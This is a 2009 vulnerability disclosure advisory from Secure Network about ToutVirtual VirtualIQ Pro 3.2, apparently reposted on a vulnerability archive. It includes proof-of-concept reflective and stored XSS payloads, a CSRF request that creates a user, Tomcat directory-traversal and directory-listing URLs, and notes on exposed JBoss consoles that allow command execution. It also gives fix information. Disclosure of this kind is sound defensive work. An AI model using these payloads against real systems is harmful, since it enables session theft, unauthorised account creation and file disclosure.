ToutVirtual VirtualIQ Multiple Vulnerabilities

2010.05.21
Risk: High
Local: No
Remote: Yes

Secure Network - Security Research Advisory Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882 Systems not affected: -- Severity: High Local/Remote: Remote Vendor URL: http://www.toutvirtual.com Author(s): Alberto Trivero (a.trivero (at) securenetwork (dot) it [email concealed]) Claudio Criscione (c.criscione (at) securenetwork (dot) it [email concealed]) Vendor disclosure: 02/07/2009 Vendor acknowledged: 16/07/2009 Vendor patch release: notified us on 06/11/2009 Public disclosure: 07/11/2009 Advisory number: SN-2009-02 Advisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt *** SUMMARY *** ToutVirtual's VirtualIQ Pro is specifically designed for IT administrators responsible for managing virtual platforms. VirtualIQ Pro provides Visibility, Analytics and policy-based Optimization - all from one single console. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type II hypervisors. VirtualIQ Pro can be used to visualize, analyze and optimize your choice of virtualization platform - Citrix, Microsoft, Novell, Oracle and/or VMware. Multiple vulnerabilities has been found which a allow an attacker to conduct various XSS and CSRF attack, and other attacks due to the use of an old an not hardened version of the web server. *** VULNERABILITY DETAILS *** (a) Cross-site scripting (XSS) Due to an improper sanitization of user's input, multiple XSS attacks (reflective and stored) are possible. Reflective PoCs: http://server:9080/tvserver/server/user/setPermissions.jsp?userId=1"><sc ript>alert(1)</script>&resultResourceIds=111-222-1933email (at) address (dot) t [email concealed] st http://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&a mp;deptName=%22;alert(1);//&deptId=1&deptDesc=asd http://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;aler t(1);// http://server:9080/tvserver/reports/virtualIQAdminReports.do?command=get Filter&reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E Stored XSS attacks can be triggered in the "Middle Name" parameter in the "Edit Profile" page with an HTTP request like the following: POST /tvserver/user/user.do?command=save&userId=1 HTTP/1.1 Host: server:9080 Cookies: JSESSIONID=[...] userName=IQMANAGER&firstName=IQ&middleName=asd'; alert(document.cookie);//&lastName=MANAGER&email=user%40domain.it&passwo rd=********&retypePassword=********&redirect=null&passwordModifed=false& isReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1 (b) Cross-site request forgery (CSRF) An attacker can perform different types of CSRF attacks against a logged user. He can, for example, shutdown, start or restart an arbitrary virtual machine, schedule new activities and so on. The following HTTP request, if forged by the attacker and executed by the victim while logged on VirtualIQ, creates an arbitrary user: POST /tvserver/user/user.do?command=save&userId= HTTP/1.1 Host: server:9080 Cookie: JSESSIONID=[...] userName=asd1&firstName=asd2&middleName=asd3&lastName=asd4&email=asd5%40 asd.com&password=asd6&retypePassword=asd6&redirect=null&passwordModifed= false&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&location Id=1 (c) Web server vulnerabilities VirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which multiple public vulnerabilities have been released. As a PoC, a directory traversal attack (CVE-2008-2938) can be performed as: http://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml Listing of an arbitrary directory (CVE-2006-3835) can also be obtained with the following PoC: http://192.168.229.85:9080/tvserver/server/;index.jsp (d) Information Leakage Tomcat status page should be disabled or restricted, being accessible at: http://status:9080/status Username and password to access a VM through SSH are also available in clear text in the configuration page. Since an XSS vulnerability can also be triggered in the same page, an attacker would also be able to easily capture the full credentials to access the VM with a specially crafted XSS payload. (e) Remote code execution JBoss JMX Management Console is exposed and can be used by remote attackers to execute arbitrary commands on the system: http://server:9080/jmx-console/ JBoss Web Console is exposed as well and can be used by remote attackers to execute any command on the system: http://server:9080/web-console/ *** EXPLOIT *** Attackers may exploit these issues through a common browser as explained above. *** FIX INFORMATION *** Upgrade to the latest version, at the moment 3.5 build 10.14.2009 *** WORKAROUNDS *** -- ********************* *** LEGAL NOTICES *** ********************* Secure Network (www.securenetwork.it) is an information security company, which provides consulting and training services, and engages in security research and development. We are committed to open, full disclosure of vulnerabilities, cooperating whenever possible with software developers for properly handling disclosure. This advisory is copyright 2009 Secure Network S.r.l. Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. It may not be edited in any way without the express consent of Secure Network S.r.l. Permission is explicitly given for insertion in vulnerability databases and similars, provided that due credit is given to Secure Network. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. This information is provided as-is, as a free service to the community by Secure Network research staff. There are no warranties with regard to this information. Secure Network does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. If you have any comments or inquiries, or any issue with what is reported in this advisory, please inform us as soon as possible. E-mail: securenetwork (at) securenetwork (dot) it [email concealed] GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc Phone: +39 02 24 12 67 88 -- Claudio Criscione Secure Network S.r.l. Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia Tel: +39 02.24126788 Mob: +39 392 3389178 email: c.criscione (at) securenetwork (dot) it [email concealed] web: www.securenetwork.it

References:

http://www.securityfocus.com/archive/1/archive/1/507729/100/0/threaded
http://www.securenetwork.it/ricerca/advisory/download/SN-2009-02.txt
http://secunia.com/advisories/37297


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